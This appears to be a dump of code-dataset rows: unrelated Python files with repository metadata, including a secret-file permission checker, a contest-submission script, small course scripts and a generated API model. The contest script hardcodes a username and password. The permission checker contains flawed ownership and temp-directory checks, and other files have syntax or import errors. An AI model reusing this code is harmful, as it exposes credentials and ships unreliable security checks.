:param path_name: str: the pathname we've been asked about
:param read_only: bool: True if the file must be read-only to everyone but owner
files must are always readable only by owner
:return: None
:raises: OSError: If the file doesn't exist or permissions look wrong
"""
stat_buffer = os.stat(path_name)
mode = stat_buffer.st_mode
if stat.S_ISLNK(mode):
link_path = os.readlink(path_name)
if not link_path.startswith("/"):
link_directory = os.path.dirname(path_name)
link_path = os.path.join(link_directory, link_path)
FileSecret._check_full_path_permissions(file_name=link_path)
return
if not (stat.S_ISDIR(mode) or stat.S_ISREG(mode)):
raise OSError('"%s" is not a file, directory or link' % path_name)
if not (temp_ok and path_name == "/tmp" or path_name == "/var/tmp" and mode & stat.S_ISVTX):
# That combination looks to see if it's under a temp dir which is marked sticky...
# this is useful for testing...
if mode & (stat.S_IWOTH | stat.S_IWGRP):
raise OSError('"%s" is writable by other or group' % path_name)
if read_only or stat.S_ISREG(mode):
if mode & (stat.S_IROTH | stat.S_IRGRP):
raise OSError('"%s" is readable by other or group' % path_name)
if FileSecret.uids and stat_buffer.st_uid not in FileSecret.uids:
raise OSError(
'user id %s is not a permissible owner for "%s". %s'
% (stat_buffer.st_uid, path_name, str(list(FileSecret.uids)))
)
if FileSecret.gids and stat_buffer.st_uid not in FileSecret.gids:
raise OSError(
'group id %s is not a permissible owner for "%s". %s'
% (stat_buffer.st_uid, path_name, str(list(FileSecret.gids)))
)
# Well, if we got this far, it must be OK :-)
@staticmethod
def make_uids(uids):
"""
Convert the arguments from user names to user ids
:param uids: list(union(str, int))
:return: list(int)
"""
ret_uids = []
for uid in uids:
if isinstance(uid, int):
ret_uids.append(uid)
else:
try:
ret_uids.append(pwd.getpwnam(uid).pw_uid)
except KeyError:
pass
return set(ret_uids)
@staticmethod
def make_gids(gids):
"""
Convert the arguments from group names to group ids
:param gids: list(union(str, int))
:return: list(int)
"""
ret_gids = []
for gid in gids:
if isinstance(gid, int):
ret_gids.append(gid)
else:
try:
ret_gids.append(grp.getgrnam(gid.gr_gid))
except KeyError:
pass
return set(ret_gids)
def get(self):
"""
Get the value of the secret
:return: str: value of secret [or other appropriate value ;-)]
:raises OSError: For a variety of reasons.
"""
file_name = self._secret_parameters.get("filename", self.secret_name)
if not file_name.startswith("/"):
file_name = os.path.join(self.DEFAULT_SECRET_DIR, file_name)
try:
self._check_full_path_permissions(file_name)
with open(file_name) as secret_fd:
return secret_fd.read()
except OSError as error:
raise OSError('FileSecret("%s"): %s.' % (self.secret_name, str(error)))
def set(self, new_value):
"""
Set the value of the file-stored secret...
:param new_value:
:return: None
"""
file_name = self._secret_parameters.get("filename", self.secret_name)
if not file_name.startswith("/"):
file_name = os.path.join(self.DEFAULT_SECRET_DIR, file_name)
try:
self._check_full_path_permissions(file_name)
with open(file_name, "w") as secret_fd:
if self._perform_external_update():
return secret_fd.write(new_value)
else:
raise RuntimeError(
'External secret update failed. Secret "%s" unchanged' % self.secret_name
)
except OSError as error:
raise OSError('FileSecret("%s"): %s.' % (self.secret_name, str(error)))
@AssimSecret.register
class Neo4jSecret(FileSecret):
"""
Class for the Neo4j password and so on as secrets...
"""
def __init__(self, secret_name, secret_parameters):
if secret_parameters is None:
secret_parameters = {}
if "filename" not in secret_parameters:
secret_parameters["filename"] = "neo4j.creds"
FileSecret.__init__(self, secret_name, secret_parameters)
self.add_update_function(Neo4jSecret._update_neo4j)
@staticmethod
def _update_neo4j(_secret_name, _secret_parameters):
"""
Tell neo4j to change their password.
FIXME: Actually do this work! :-D
:param _secret_name: str: not used
:param _secret_parameters: dict: not used
:return: bool
"""
# foo = secret_name + str(secret_parameters)
# return foo is foo
return True
def get(self):
"""
The Neo4j secret object returns a list of [login, password]
Since the last character in the file is a newline, it would like to
return a list of three items with the last one being an empty string.
We exclude the empty string from the return value, so you only
get two of them.
:return: [str, str] : [login-string, password-string]
"""
return [line for line in FileSecret.get(self).split("\n") if line]
if __name__ == "__main__":
print("doing stuff")
AssimSecret.set_secret_info_map(
{
"secret": {"type": "file", "filename": "/home/alanr/secret/secret"},
"not_secret": {"type": "file", "filename": "/home/alanr/secret/not_secret"},
"foobar": {"type": "file", "filename": "/home/alanr/secret/foobar"},
}
)
uid_list = ["alanr", "root", "sys", "bin", "adm"]
FileSecret.set_uids_and_gids(uid_list)
secret = AssimSecret.factory("secret")
print("GET: %s" % secret.get())
secret = AssimSecret.factory("not_secret")
try:
print("GET: %s" % secret.get())
except OSError as os_err:
if "is readable by" not in str(os_err):
print("Wrong error raised (%s)" % (str(os_err)))
else:
print("No error raised for not_secret file")
secret = AssimSecret.factory("foobar")
try:
print("GET: %s" % secret.get())
except OSError as os_err:
if "No such file or directory" not in str(os_err):
print("Wrong error raised (%s)" % (str(os_err)))
else:
print("No error raised for foobar file")
FileSecret.set_uids_and_gids(uids=("root", "bin", "adm"))
print("UIDS: %s" % FileSecret.uids)
secret = AssimSecret.factory("secret")
try:
print("GET: %s" % secret.get())
except OSError as os_err:
if "not a permissible owner" not in str(os_err):
print("Wrong error raised (%s)" % (str(os_err)))
else:
print("No owner error raised for secret file")
| [
"alanr@unix.sh"
] | alanr@unix.sh |
7d5305cd34ee140fc2bab55db7859ffacd8085f7 | ead7cbd52a274daa1d760ddb7903eb9ba6bde6af | /scripts/main_code.py | 39244b65301dad92426e66a8b526d785915f44f5 | [] | no_license | ngksg/Coursera_Capstone | 7ae09947b98ab52db8a2267075c05a416de43ed2 | 63d891940aea372c56384aea484feb9cb710b0e0 | refs/heads/main | 2023-06-25T07:03:31.084679 | 2021-07-29T07:01:58 | 2021-07-29T07:01:58 | 389,881,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py |
cases = [100,200,400,500]
import pandas as pd
import Numpy as np
print("test")
print("test2")
| [
"ngksg@hotmail.com"
] | ngksg@hotmail.com |
015cc7108b94acdc1865bf5881797c8d359b9214 | 3b6677b0be8e0e24939e48f0cd346e0022df9013 | /api/app.py | 3c4b8838addec446cfc8b6e4b17c9b5187b9f1e7 | [] | no_license | Pratheebhak/biotag | fc00707f57c1fa5789117d383d3c830adb88d7b8 | 14521b2687011927b016f7eebef12f145b4fa894 | refs/heads/master | 2023-01-07T13:21:18.205479 | 2020-11-02T19:30:38 | 2020-11-02T19:30:38 | 297,431,778 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | """ API for the model """
from flask import Flask, request, jsonify
# Create a Flask API
app = Flask(__name__)
app.config["DEBUG"] = True
# Create Routes
@app.route('/', methods=['GET'])
def home():
return "<h1>Handwritten Label Extraction on Botanical Images</h1>"
if __name__ = '__main__':
app.run() | [
"pratheebha11@gmail.com"
] | pratheebha11@gmail.com |
0a7f5bc245d7a0b1e7ff8dee61d3c6b185e1ebf3 | 139af68b78734a6bc53bd942ffa05476baf3d71d | /Python Fundamentals 2020 - 2021/13 - TEXT PROCESSING/More exercise - 13 - 05.py | 5a2252209bfb53e58143d4c6eca76fe595a218b6 | [] | no_license | MiroVatov/Python-SoftUni | 7fe3fc0a3928848c5317fb120f789c773bfc117e | 0d0d6f116281b4de8c413d254386e27d992d047b | refs/heads/main | 2023-08-24T09:44:31.261137 | 2021-10-18T14:04:03 | 2021-10-18T14:04:03 | 317,510,574 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | title_of_an_article = input()
print(f"<h1>")
print(title_of_an_article)
print(f"</h1>")
content_of_the_article = input()
print(f"<article>")
print(content_of_the_article)
print(f"</article>")
while True:
comment = input()
if comment == "end of comments":
break
print(f"<div>")
print(comment)
print(f"</div>") | [
"noreply@github.com"
] | MiroVatov.noreply@github.com |
af39c0109974dc34aed68d14d3ce5567d0a67d52 | 8bae0a5871f081f88f6bae1448f0a61653f1cad3 | /PROCO15/BalancePendulum/BalancePendulum.py | 400ed4d95136feae429cbd77eb8d28c931008ef4 | [] | no_license | IamUttamKumarRoy/contest-programming | a3a58df6b6ffaae1947d725e070d1e32d45c7642 | 50f2b86bcb59bc417f0c9a2f3f195eb45ad54eb4 | refs/heads/master | 2021-01-16T00:28:53.384205 | 2016-10-01T02:57:44 | 2016-10-01T02:57:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,960 | py | import requests
import time
s = requests.Session()
def submit(val) :
url = "http://proco2015-r2-890298229.us-west-1.elb.amazonaws.com/tasks/pendulum/submit"
files = {"actions.txt": val}
s.post(url, files=files)
def start_session() :
global s
data = {"username": "ecnerwal", "password" : "PfCazJAD"}
url = "http://proco2015-r2-890298229.us-west-1.elb.amazonaws.com/login"
s.post(url, data=data)
def gen_string(d, t1, t2, t3, t4) :
res = ""
for ang in range(-90, 91):
for vel in range(-30, 30):
right = False
if(vel == 0 and ang == 0) :
right = (d == 1)
elif(abs(vel) == 0) :
right = (ang > 0)
elif(abs(vel) == 1) :
if(abs(ang) >= t1) :
right = (ang > 0)
else:
right = (vel > 0)
elif(abs(vel) == 2) :
if(abs(ang) >= t2) :
right = (ang > 0)
else:
right = (vel > 0)
elif(abs(vel) == 3) :
if(abs(ang) >= t3) :
right = (ang > 0)
else:
right = (vel > 0)
elif(abs(vel) == 4) :
if(abs(ang) >= t4) :
right = (ang > 0)
else:
right = (vel > 0)
else:
right = vel > 0
res = "{}{} {} {}\n".format(res, ang + 90, vel, 'R' if right else 'L')
return res
def main() :
start_session()
for t4 in range(11, 13):
for t3 in range(6, 13):
for t2 in range(6, 13):
for t1 in range(6, 13):
for d in range(2) :
if(t1 <= t2 and t2 <= t3 and t3 <= t4):
submit(gen_string(d, t1, t2, t3, t4))
print("{} {} {} {} {}".format(d, t1, t2, t3, t4))
main()
| [
"he.andrew.mail@gmail.com"
] | he.andrew.mail@gmail.com |
715b78f5c54afb7db2f05ce2265f7dd90eed0a8d | 76a68cbbaf9c4aa15ec9b59455e33c6784229bdb | /MECS_gym/venv/bin/easy_install-3.5 | 82fa72283113e10abd217602c94e6c52cf7de730 | [
"MIT"
] | permissive | Python-Repository-Hub/KAIST_MEC_simulator | e63f704bd20b36fd1a8ffa30b7e736c50351d1cc | 26556a8216e2bbdfa5c5ee377e9deb51ea7602f8 | refs/heads/master | 2023-08-30T06:57:39.003766 | 2021-11-18T16:16:48 | 2021-11-18T16:16:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | 5 | #!/home/wisrl/Downloads/baselines-master_final_ppo2/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.5'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.5')()
)
| [
"elasteam88@gmail.com"
] | elasteam88@gmail.com |
63672e5230782b6ef6729b1836332595ccc3ecfd | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Generators/Pythia_i/share/PYTUNE_pprintout.py | 564fee7303a86b2b89df12767930b5600ed7390c | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | #______________________________________________________________________________________________________________________
# author: liza.mijovic@_nospam_cern.ch
#
# jO effect: dump the values of all parameters PYTUNE can set - this jopts are meant for runnig with GET_TUNE_params.sh
#
# ______________________________________________________________________________________________________________________
from AthenaCommon.AlgSequence import AlgSequence
topAlg = AlgSequence("TopAlg")
from Pythia_i.Pythia_iConf import Pythia
topAlg += Pythia()
Pythia = topAlg.Pythia
theApp.EvtMax = 0
Pythia.Tune_Name="ATLAS_-1"
Pythia.Direct_call_to_pytune=REPIND
# if one want the call to be equivalen to Pythia.Tune_Name="PYTUNE_XXX"
# the ATLAS stable particles convention should also be added
Pythia.PygiveCommand += [ "mstj(22)=2" ]
PYDAT1_PARAMS=[ "MSTU", "PARU", "MSTJ", "PARJ" ]
PYPARS_PARAMS=[ "MSTP", "PARP", "MSTI", "PARI" ]
PYTUNE_PARAMS=PYDAT1_PARAMS+PYPARS_PARAMS
PQ_LIST=[]
for i in PYTUNE_PARAMS:
PQ_LIST+=[i+"("+repr(x)+")=" for x in range(1,201)]
Pythia.PygiveCommand += PQ_LIST
Pythia.Param_Query_AfterInit += PQ_LIST
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
f43e0ddb2fcdcb7dc177f350b6b4392c4c8151cf | e519a3134e5242eff29a95a05b02f8ae0bfde232 | /services/control-tower/vendor/riffyn-sdk/swagger_client/models/inline_response2009.py | d0159adf2ba606c4d7868ece17e12f892cd52bd6 | [] | no_license | zoltuz/lab-automation-playground | ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e | 7a21f59b30af6922470ee2b20651918605914cfe | refs/heads/master | 2023-01-28T10:21:51.427650 | 2020-12-04T14:13:13 | 2020-12-05T03:27:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,874 | py | # coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: support@riffyn.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class InlineResponse2009(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'result': 'str'
}
attribute_map = {
'result': 'result'
}
def __init__(self, result=None): # noqa: E501
"""InlineResponse2009 - a model defined in Swagger""" # noqa: E501
self._result = None
self.discriminator = None
if result is not None:
self.result = result
@property
def result(self):
"""Gets the result of this InlineResponse2009. # noqa: E501
Resource Type successfully deleted. # noqa: E501
:return: The result of this InlineResponse2009. # noqa: E501
:rtype: str
"""
return self._result
@result.setter
def result(self, result):
"""Sets the result of this InlineResponse2009.
Resource Type successfully deleted. # noqa: E501
:param result: The result of this InlineResponse2009. # noqa: E501
:type: str
"""
self._result = result
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(InlineResponse2009, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InlineResponse2009):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"jaceys.tan@gmail.com"
] | jaceys.tan@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.